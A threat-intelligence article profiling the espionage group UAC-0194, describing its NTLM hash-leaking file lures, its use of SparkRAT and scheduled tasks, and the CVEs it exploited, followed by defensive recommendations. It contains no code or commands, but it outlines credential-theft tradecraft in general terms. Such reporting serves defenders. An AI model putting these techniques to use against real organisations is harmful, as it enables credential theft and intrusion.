UAC-0194 has emerged as an immediate priority regarding which Windows Authentication (WinAuth) security vulnerabilities exist, specifically East European phishing attacks, related to the use of NTLM Credential Authentication. The amount of time during which this Espionage Operations has existed has allowed UAC-0194 to show us that it knows how to utilize NTLM as a weapon in order to convert basic (legitimate) files into weaponised (illicit) files and also know how to move from theft of credentials to an extended period of time of monitoring (and collecting) intelligence on the targets. This article shall provide a complete, original and timely assessment regarding UAC-0194, this group’s operational methods, their motivations and the anticipated operational implications of their Campaigns through 2025.
Introduction: A Threat Actor Built Around Subtlety and Precision
UAC-0194 is known for its calculated and precise approach to gathering information, rather than through disruptive or attention-grabbing means. This group’s trademark is its ability to produce NTLMv2 hashes from targeted documents with minimal interaction from users and considerable advantage over traditional means of gaining access. As opposed to other financially motivated threats that exist, UAC-0194 exhibits traits typically associated with long-term intelligence collection. The ways it targets, the rate at which it operates, and the types of vulnerabilities it exploits lead one to believe they are specifically interested in government, diplomatic, and administrative infrastructures within Ukraine, Poland, and Romania. UAC-0194’s quick succession from exploiting one NTLM disclosure to another indicates an exceptionally sophisticated development cycle for a regional espionage group.
Identity and Motivation: A Regionally Focused Espionage Actor
Identifying the motivation behind espionage actors who are Regionally Focused is challenging due to the limited information available. However, a growing body of intelligence has demonstrated a significant link to Russian actors based on their choice of victims and the infrastructure utilized by both the actors and their identified links to the affected infrastructure in the past. Evidence from CERT-UA’s UAC-0194 tracking also suggests the group has maintained a continuous presence within operations targeting Ukrainian organizations.
The group’s goals appear to include:
– Establishing an initial position within Government and Public Institutions.
– Obtaining NTLMv2 hashes that allow the group to perform offline cracking or to replay operations.
– Maximizing access to high-value Sensitive Communications.
– Establishing a foothold to perform additional espionage operations via lightweight remote access methods.
The operational model for UAC-0194 does not utilise complicated malware families as do many of its counterparts. Instead, they primarily gain advantages through authentication, which allows for diminished artifacts and present less opportunity for detection when committing their operations.
TTPs: A Deep Dive Into the Group’s Operational Mechanics
Furthermore, the majority of UAC-0194’s attack patterns may appear uncomplicated at first. Below this point, however, exists a carefully constructed operational workflow that has been developed to exploit authentication behaviours found within Windows, evade authentication logs and maintain operational tempo.
Initial Access: Weaponized Shortcuts and Controlled Infrastructure
Phishing emails commonly impersonate legitimate Ukrainian Government Email Servers; in many instances, these emails do truly originate from legitimate Government mail servers. Previous compromises of Public Sector Mail Boxes provide the attacker the opportunity to send lures that appear authentic to the Government recipients.
What distinguishes UAC-0194, and how this malware’s delivery method differs substantially from other Malware Examples, is that while typical Malware uses bulk e-mailing of either macro-enabled Spreadsheet files or Trojanized Installer executable files as its primary attachment type, UAC-0194 uses an attachment type of .url, .lnk, and .library-ms files. By previewing or opening these file types, Automatic Outgoing Authentication Requests may be sent by the compromised user (NTLM-hashes), thus exposing NTLM Hashes to attacker-controlled infrastructure.
Pros:
– Requires very little User Interaction
– Makes Minimal Modifications to the Target System
– Provides Users with Valuable Authentication Information for Replay.
Persistence: Lean, Practical, and Deceptively Simple
Once inside, UAC-0194 does not utilize elaborate Infrastructure Persistence Frameworks. Instead, the UAC-0194 group is focused on:
– Reusing Stolen NTLM Hashes
– Using the SparkRAT or Similar Open Source Tools when a Stable Access Point is needed
– Creating Lightweight Scheduled Tasks as needed for obtaining and rebuilding footholds
The Lean, Practical and Deceptively Simple Models allow UAC-0194 to leave Minimal Forensic Residue at the Target and therefore Maximizing the success of their Espionage Objectives.
C2 and Internal Operations: Blending With Normal Traffic
The actor of UAC‑0194 has a preference for hosting payloads in the cloud, redirecting commands through a network which obscures where the command is really coming from, and utilizing encrypted communication channels via standard web protocols. This is done to ensure that their communications blend with the background noise of modern enterprise networks.
Notable Operations: A Timeline of Rapid Evolution
The UAC‑0194 operations have evolved rapidly since their inception.
Late 2024: The CVE‑2024‑43451 Zero‑Day
The first public revelation about the activity of the UAC‑0194 group was related to the exploitation of a zero‑day vulnerability associated with an NTLM disclosure. As part of this attack, the UAC‑0194 group used .library‑ms files that would trigger remote file loading through NTLMv2 authentication. This was primarily focused on targeting Ukrainian government institutions.
Early 2025: Transition to CVE‑2025‑24054
Immediately following Microsoft’s release of patch updates for the NTLM vulnerability, UAC‑0194 took advantage of a new but equally vulnerable NTLM disclosure method which had similarities to the first attack. These campaigns were now successful in expanding into Poland and Romania, revealing UAC‑0194’s broader geopolitical aspirations.
Continuing Activity: Credential Replay and Remote Access Deployment
The goal of this ongoing effort continues to be hash harvesting. However, in several cases of an observed breach, after the initial use of SparkRAT to establish a foothold on a system and/or gain remote access to a system for the purpose of harvesting hashes, the threat actor appears to have used the same tool for further reconnaissance and/or internal data access.
Recent Developments: A Threat Growing in Precision and Pace
The significant aspect of UAC‑0194 is that it has a much higher level of operational tempo (the number of breaches), in addition to its significant technical capability. Some characteristics of UAC‑0194 include:
– Rapidly exploiting new NTLM-related vulnerabilities
– Using regional intelligence as its target audience
– Creating more sophisticated phishing lures tailored to governmental agency workflows
– Making greater use of open-source tools to reduce the risk of attribution
This combination of factors indicates that UAC‑0194 is evolving as a threat and displays the capability to modify its techniques with little to no downtime.
Conclusion
Implications for 2025 and Defensive Recommendations
UAC-0194’s approach demonstrates underestimating NTLM-related authentication-based flow attacks and shows the continued reliance on antiquated security models for many public sector networks. Based upon the combination of low interaction lures, selective use of tools, and regionally focused targeting, the entity’s actions align with long-term espionage activities rather than opportunistic actions in the short term.
Key Defensive Measures
Organizations (including Government and Critical Public Sector organizations) should:
– Transition away from NTLM at every possible opportunity as quickly as possible
– Require all Servers implementing SMB Signing and block all Outbound NTLM Authentication Requests
– Disable processing from Remote File Paths in .url and .library-ms file types
– Implement Multifactor Authentication (MFA) that is Phishing Resistant at Administrative Interfaces
– Monitor for Authentication Attempts that are Sudden and Made to Unusual Domain Names
– Conduct an Audit of Mailboxes to Identify Signs of Compromise that may have been Used to Distribute Lures
UAC-0194 will continue to hone its techniques throughout 2025, with an increased focus on manipulating authentication, stealthily using reconnaissance, and penetrating Regional Government Networks. Therefore, proactive security measures and increased scrutiny of file-based lures must be employed to provide a counter to the continuously evolving threat posed by this fast-moving espionage organization.
You can download and review the sheet for all the details!
